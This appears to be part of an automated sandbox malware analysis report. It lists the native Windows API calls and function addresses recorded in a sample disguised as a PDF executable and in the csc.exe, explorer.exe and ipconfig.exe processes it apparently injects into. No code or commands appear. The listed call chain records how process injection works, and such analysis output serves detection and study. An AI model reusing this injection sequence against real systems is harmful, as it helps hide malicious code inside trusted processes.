Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2F90 NtProtectVirtualMemory,LdrInitializeThunk,	6_2_059A2F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2FB0 NtResumeThread,LdrInitializeThunk,	6_2_059A2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2FE0 NtCreateFile,LdrInitializeThunk,	6_2_059A2FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2F30 NtCreateSection,LdrInitializeThunk,	6_2_059A2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2E80 NtReadVirtualMemory,LdrInitializeThunk,	6_2_059A2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	6_2_059A2EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_059A2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2B60 NtClose,LdrInitializeThunk,	6_2_059A2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2AD0 NtReadFile,LdrInitializeThunk,	6_2_059A2AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A35C0 NtCreateMutant,	6_2_059A35C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A4650 NtSuspendThread,	6_2_059A4650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A3090 NtSetValueKey,	6_2_059A3090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A3010 NtOpenDirectoryObject,	6_2_059A3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A4340 NtSetContextThread,	6_2_059A4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2DB0 NtEnumerateKey,	6_2_059A2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A3D10 NtOpenProcessToken,	6_2_059A3D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2D00 NtSetInformationFile,	6_2_059A2D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A3D70 NtOpenThread,	6_2_059A3D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2CC0 NtQueryVirtualMemory,	6_2_059A2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2CF0 NtOpenProcess,	6_2_059A2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2C00 NtQueryInformationProcess,	6_2_059A2C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2C60 NtCreateKey,	6_2_059A2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2FA0 NtQuerySection,	6_2_059A2FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2F60 NtCreateProcessEx,	6_2_059A2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2EE0 NtQueueApcThread,	6_2_059A2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2E30 NtWriteVirtualMemory,	6_2_059A2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A39B0 NtGetContextThread,	6_2_059A39B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2B80 NtQueryInformationFile,	6_2_059A2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2BA0 NtEnumerateValueKey,	6_2_059A2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2BE0 NtQueryValueKey,	6_2_059A2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2AB0 NtWaitForSingleObject,	6_2_059A2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A2AF0 NtWriteFile,	6_2_059A2AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0588A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,NtClose,	6_2_0588A036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0588A042 NtQueryInformationProcess,	6_2_0588A042
Source: C:\Windows\explorer.exe	Code function: 7_2_1124C232 NtCreateFile,NtReadFile,	7_2_1124C232
Source: C:\Windows\explorer.exe	Code function: 7_2_1124DE12 NtProtectVirtualMemory,	7_2_1124DE12
Source: C:\Windows\explorer.exe	Code function: 7_2_1124DE0A NtProtectVirtualMemory,	7_2_1124DE0A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_036035C0 NtCreateMutant,LdrInitializeThunk,	9_2_036035C0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602B60 NtClose,LdrInitializeThunk,	9_2_03602B60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602AF0 NtWriteFile,LdrInitializeThunk,	9_2_03602AF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602AD0 NtReadFile,LdrInitializeThunk,	9_2_03602AD0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602F30 NtCreateSection,LdrInitializeThunk,	9_2_03602F30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602FE0 NtCreateFile,LdrInitializeThunk,	9_2_03602FE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_03602EA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602D00 NtSetInformationFile,LdrInitializeThunk,	9_2_03602D00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602D10 NtMapViewOfSection,LdrInitializeThunk,	9_2_03602D10
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602DF0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_03602DF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602DD0 NtDelayExecution,LdrInitializeThunk,	9_2_03602DD0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602C60 NtCreateKey,LdrInitializeThunk,	9_2_03602C60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602C70 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_03602C70
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602CA0 NtQueryInformationToken,LdrInitializeThunk,	9_2_03602CA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03604340 NtSetContextThread,	9_2_03604340
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03603010 NtOpenDirectoryObject,	9_2_03603010
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03603090 NtSetValueKey,	9_2_03603090
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03604650 NtSuspendThread,	9_2_03604650
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602BE0 NtQueryValueKey,	9_2_03602BE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602BF0 NtAllocateVirtualMemory,	9_2_03602BF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602BA0 NtEnumerateValueKey,	9_2_03602BA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602B80 NtQueryInformationFile,	9_2_03602B80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602AB0 NtWaitForSingleObject,	9_2_03602AB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_036039B0 NtGetContextThread,	9_2_036039B0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602F60 NtCreateProcessEx,	9_2_03602F60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602FA0 NtQuerySection,	9_2_03602FA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602FB0 NtResumeThread,	9_2_03602FB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602F90 NtProtectVirtualMemory,	9_2_03602F90
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602E30 NtWriteVirtualMemory,	9_2_03602E30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602EE0 NtQueueApcThread,	9_2_03602EE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602E80 NtReadVirtualMemory,	9_2_03602E80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03603D70 NtOpenThread,	9_2_03603D70
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602D30 NtUnmapViewOfSection,	9_2_03602D30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03603D10 NtOpenProcessToken,	9_2_03603D10
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602DB0 NtEnumerateKey,	9_2_03602DB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602C00 NtQueryInformationProcess,	9_2_03602C00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602CF0 NtOpenProcess,	9_2_03602CF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03602CC0 NtQueryVirtualMemory,	9_2_03602CC0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C5A3E0 NtReadFile,	9_2_00C5A3E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C5A330 NtCreateFile,	9_2_00C5A330
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C5A460 NtClose,	9_2_00C5A460
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C5A2EA NtCreateFile,	9_2_00C5A2EA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C5A32B NtCreateFile,	9_2_00C5A32B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03989BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	9_2_03989BAF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0398A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,	9_2_0398A036
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03989DDD NtWriteVirtualMemory,NtResumeThread,	9_2_03989DDD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03989BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	9_2_03989BB2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0398A042 NtQueryInformationProcess,	9_2_0398A042

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7881480	0_2_00007FF7D7881480
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7882BA0	0_2_00007FF7D7882BA0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7869B70	0_2_00007FF7D7869B70
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7868900	0_2_00007FF7D7868900
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7964740	0_2_00007FF7D7964740
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7884790	0_2_00007FF7D7884790
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7907680	0_2_00007FF7D7907680
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D78705E4	0_2_00007FF7D78705E4
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7880600	0_2_00007FF7D7880600
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7886450	0_2_00007FF7D7886450
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7862230	0_2_00007FF7D7862230
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7857250	0_2_00007FF7D7857250
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7867280	0_2_00007FF7D7867280
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D78B2140	0_2_00007FF7D78B2140
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D785B0B0	0_2_00007FF7D785B0B0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D793F0A0	0_2_00007FF7D793F0A0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D786F0D0	0_2_00007FF7D786F0D0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D787B080	0_2_00007FF7D787B080
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D788AFE0	0_2_00007FF7D788AFE0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7862F80	0_2_00007FF7D7862F80
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7883DF0	0_2_00007FF7D7883DF0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7860CA0	0_2_00007FF7D7860CA0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D787AC50	0_2_00007FF7D787AC50
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7858BC4	0_2_00007FF7D7858BC4
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7884BC0	0_2_00007FF7D7884BC0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D788DB50	0_2_00007FF7D788DB50
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7870B90	0_2_00007FF7D7870B90
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7885B10	0_2_00007FF7D7885B10
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7875A30	0_2_00007FF7D7875A30
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7858A20	0_2_00007FF7D7858A20
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D791B9B0	0_2_00007FF7D791B9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0040102E	6_2_0040102E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_00401030	6_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041EC28	6_2_0041EC28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041DD0E	6_2_0041DD0E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041E5DE	6_2_0041E5DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_00402D90	6_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_00409E5D	6_2_00409E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_00409E60	6_2_00409E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041D6C0	6_2_0041D6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_00402FB0	6_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0D5B0	6_2_05A0D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A30591	6_2_05A30591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970535	6_2_05970535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A27571	6_2_05A27571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1E4F6	6_2_05A1E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2F43F	6_2_05A2F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A22446	6_2_05A22446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05961460	6_2_05961460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2F7B0	6_2_05A2F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596C7C0	6_2_0596C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05994750	6_2_05994750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970770	6_2_05970770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A216CC	6_2_05A216CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598C6E0	6_2_0598C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A301AA	6_2_05A301AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597B1B0	6_2_0597B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A281CC	6_2_05A281CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05960100	6_2_05960100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0A118	6_2_05A0A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F8158	6_2_059F8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A3B16B	6_2_05A3B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A516C	6_2_059A516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2F0E0	6_2_05A2F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A270E9	6_2_05A270E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1F0CC	6_2_05A1F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059B739A	6_2_059B739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A303E6	6_2_05A303E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597E3F0	6_2_0597E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2132D	6_2_05A2132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595D34C	6_2_0595D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2A352	6_2_05A2A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059752A0	6_2_059752A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A112ED	6_2_05A112ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598B2C0	6_2_0598B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F02C0	6_2_059F02C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A10274	6_2_05A10274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05988DBF	6_2_05988DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598FDC0	6_2_0598FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596ADE0	6_2_0596ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597AD00	6_2_0597AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A27D73	6_2_05A27D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05973D40	6_2_05973D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A21D5A	6_2_05A21D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A10CB5	6_2_05A10CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2FCF2	6_2_05A2FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05960CF2	6_2_05960CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970C00	6_2_05970C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E9C32	6_2_059E9C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971F92	6_2_05971F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2FFB1	6_2_05A2FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EEFA0	6_2_059EEFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05962FC8	6_2_05962FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597CFE0	6_2_0597CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05990F30	6_2_05990F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2FF09	6_2_05A2FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059B2F28	6_2_059B2F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E4F40	6_2_059E4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05982E90	6_2_05982E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05979EB0	6_2_05979EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2CE93	6_2_05A2CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2EEDB	6_2_05A2EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2EE26	6_2_05A2EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05970E59	6_2_05970E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A3A9A6	6_2_05A3A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059729A0	6_2_059729A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05979950	6_2_05979950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598B950	6_2_0598B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05986962	6_2_05986962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059568B8	6_2_059568B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E8F0	6_2_0599E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059738E0	6_2_059738E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DD800	6_2_059DD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05972840	6_2_05972840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597A840	6_2_0597A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598FB80	6_2_0598FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059ADBF9	6_2_059ADBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E5BF0	6_2_059E5BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A26BD7	6_2_05A26BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2FB76	6_2_05A2FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2AB40	6_2_05A2AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0DAAC	6_2_05A0DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596EA80	6_2_0596EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059B5AA0	6_2_059B5AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1DAC6	6_2_05A1DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A27A46	6_2_05A27A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2FA49	6_2_05A2FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E3A6C	6_2_059E3A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0588A036	6_2_0588A036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0588E5CD	6_2_0588E5CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05881082	6_2_05881082
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0588B232	6_2_0588B232
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05882D02	6_2_05882D02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05888912	6_2_05888912
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05885B30	6_2_05885B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05885B32	6_2_05885B32
Source: C:\Windows\explorer.exe	Code function: 7_2_10171036	7_2_10171036
Source: C:\Windows\explorer.exe	Code function: 7_2_10168082	7_2_10168082
Source: C:\Windows\explorer.exe	Code function: 7_2_1016F912	7_2_1016F912
Source: C:\Windows\explorer.exe	Code function: 7_2_10169D02	7_2_10169D02
Source: C:\Windows\explorer.exe	Code function: 7_2_101755CD	7_2_101755CD
Source: C:\Windows\explorer.exe	Code function: 7_2_10172232	7_2_10172232
Source: C:\Windows\explorer.exe	Code function: 7_2_1016CB32	7_2_1016CB32
